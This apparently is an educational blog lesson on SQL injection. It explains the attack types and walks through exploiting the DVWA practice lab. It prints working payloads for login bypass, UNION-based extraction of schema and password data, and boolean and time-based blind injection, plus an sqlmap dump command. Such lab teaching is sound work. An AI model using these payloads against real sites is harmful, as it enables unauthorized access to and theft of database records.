SQL Injection (SQLi) is one of the most well-known, dangerous, and persistent web application vulnerabilities. Despite being discovered over two decades ago, SQLi continues to plague insecure applications and has been responsible for some of the biggest security breaches in history. In this lesson, we’ll break down what SQL Injection is, how it works, the different types of attacks, and how to exploit it in a controlled lab environment.
What is SQL Injection?
At its core, SQL Injection is a technique where an attacker manipulates user-supplied input so that it gets interpreted as part of a SQL query. If the application does not properly validate or sanitize inputs, the attacker can alter queries to the database and potentially:
- Bypass authentication
- Extract sensitive data (like usernames, passwords, credit card numbers)
- Modify or delete records
- Execute administrative operations on the database
- In severe cases, execute system commands on the underlying server
This makes SQLi not just a vulnerability but a critical security risk that can lead to total compromise of the application and its data.
- A simple diagram showing User Input → Vulnerable Application → Database with arrows, and how injection manipulates the query.
Understanding How SQL Injection Works
Consider a simple login form where a user enters their username and password. The backend code may look something like this:
SELECT * FROM users WHERE username = '$username' AND password = '$password';If the application does not sanitize inputs, an attacker could enter the following in the username field:
' OR '1'='1And leave the password blank. The resulting query becomes:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';Since '1'='1' is always true, the query returns all users, effectively bypassing authentication and granting access without knowing valid credentials.
This is the simplest form of SQL Injection, but real-world attacks can get far more sophisticated.
Types of SQL Injection
SQL Injection comes in different forms depending on how the application and database respond. Here are the main categories:
1. Error-Based SQL Injection
This method relies on the application displaying database error messages. By deliberately breaking the query, an attacker can extract information from error responses, such as database version, structure, and table names.
Example payload:
' AND 1=CONVERT(int,(SELECT @@version))--2. Union-Based SQL Injection
The UNION SQL operator allows combining results from multiple queries. Attackers can leverage this to extract data from other tables within the same query.
Example payload:
1' UNION SELECT null, version() --This returns the database version alongside the normal query results.
3. Boolean-Based Blind SQL Injection
When no errors are shown, attackers can infer results based on true/false conditions. By sending different queries and observing application behavior, they can reconstruct data.
Example payload:
1' AND 1=1 --
1' AND 1=2 --If the first returns results and the second doesn’t, the injection point is confirmed.
4. Time-Based Blind SQL Injection
If there is no visible difference in the response, attackers can use time delays to extract information.
Example payload:
1' OR IF(1=1, SLEEP(5), 0)--If the page delays for 5 seconds, it confirms injection is possible.
Real-World Impact of SQL Injection
The consequences of SQL Injection go far beyond just pulling usernames and passwords. A successful SQLi attack could:
- Completely bypass authentication and grant admin access.
- Dump entire databases, exposing sensitive customer records.
- Modify or delete data, causing permanent damage.
- In some cases, escalate to remote code execution and take over the server.
This is why SQL Injection consistently appears in the OWASP Top 10 list of critical security risks.
Hands-On: Exploiting SQL Injection in DVWA
To exploit SQL Injection on DVWA (Damn Vulnerable Web Application), follow this detailed step-by-step tutorial. DVWA is designed for learning web security and practicing attacks safely.
Prerequisites:
- DVWA installed and running (usually on localhost or a VM)
- Browser
- Basic knowledge of SQL and web requests
Step 1: Set DVWA Security Level to Low
- Log in to DVWA (default credentials: admin/password).
- Go to DVWA Security on the left menu.
- Set the security level to Low and save.
Step 2: Navigate to the SQL Injection Module
- Click on SQL Injection in the left menu.
- You will see a form asking for a user ID.
Step 3: Understand the Input Field
The form takes a user ID as input and returns user details.
The backend runs a query like:
SELECT first_name, last_name FROM users WHERE user_id = '<input>';If input is not sanitized, this is vulnerable to SQL Injection.
Step 4: Basic SQL Injection Test
Input: 1' OR '1'='1
This changes the query to:
SELECT first_name, last_name FROM users WHERE user_id = '1' OR '1'='1';Because '1'='1' is always true, this returns all users.
Step 5: Extract Data Using SQL Injection
Extracting database version:
Input:
1' UNION SELECT null, @@version --Explanation:
UNION SELECT allows combining results of two queries.
null placeholder matches the first column.
@@version returns database version.
-- comments out the rest of the query.
Step 6: Enumerate Database Tables
Input:
1' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() --This returns table names in the current database.
Step 7: Extract Columns from a Table
Suppose you found a table called users.
Input:
1' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' --This returns column names in the users table.
Step 8: Extract Data from Columns
Suppose users table has user and password columns.
Input this payload
1' UNION SELECT user, password FROM users --This will dump usernames and passwords.
Step 9: Use SQLMap for Automation (Optional)
SQLMap is a powerful tool to automate SQL injection exploitation.
Command:
sqlmap -u "http://<dvwa_url>/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=<your_session_id>" --dumpReplace <dvwa_url> and session ID accordingly.
Step 10: Increase Security Level and Test Bypass
- Set DVWA security to Medium or High.
- Try bypassing with advanced payloads, e.g., using comments, encoding, or blind SQLi techniques.
Important Notes:
- Always use DVWA in a controlled environment.
- Never test SQLi on production or unauthorized systems.
- Practice blind SQLi techniques for tougher security levels.
Key Takeaways
- SQL Injection is one of the most powerful vulnerabilities, capable of compromising entire applications.
- Even simple injections can bypass logins and expose sensitive data.
- Different types of SQLi (Error-based, Union-based, Blind, Time-based) give attackers multiple ways to extract data.
- Practicing SQL Injection in a safe lab environment like DVWA builds the foundation for advanced penetration testing.
✅ By the end of this lesson, you should have a solid understanding of SQL Injection, how it works, and hands-on experience exploiting it in a controlled environment.
I’m Emmanuel Okaiwele, a Secure Web Developer, Offensive Security Engineer, Member Cybersecurity Experts Association of Nigeria – CSEAN, and the founder of Nebitex Africa — a platform dedicated to making cybersecurity simple, practical, and accessible for Africans.
